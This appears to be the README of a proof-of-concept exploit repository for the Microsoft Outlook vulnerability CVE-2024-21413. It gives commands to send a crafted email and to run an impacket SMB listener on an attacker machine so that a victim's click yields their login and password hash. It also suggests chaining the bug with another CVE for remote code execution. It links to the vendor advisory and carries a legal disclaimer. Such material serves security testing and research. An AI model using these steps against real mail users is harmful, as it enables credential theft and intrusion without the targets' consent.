Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC# CVE-2024-21413 - POC
### Usage:
```python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf```
> [!NOTE]
> r00tb1t : is the shared test file (word in this case) from the attacker machine (xx.xx.xx.xx).
>
> To ensure compliance with SPF, DKIM, and DMARC, use legitimate $IP and domain
>
> Make sure to install the pexpect library if you haven't already using ```pip install pexpect```.
### Tips to excute the POC:
- [x] Run a smb listener ```impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp``` .
- [x] Run the POC
> ```python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url example.com/path/to/shared/file/r0tb1t.rtf```
- [x] Click on the link in the received mail,and BOOM you should retrieve the login & hash in the listner
- [ ] chain this CVE with CVE-2023-21716 to obtain RCE !!!
> + Kudooooos & [details on CVE-2024-21413](https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/) .
> + [Workaround/Fix:](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413)
> [!CAUTION]
> ⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script..
[4.0K] /data/pocs/ca98eca35d578d5ba1747525ae2c0a4b5fb9b440
├── [1.5K] CVE-2024-21413.py
└── [1.6K] README.md
0 directories, 2 files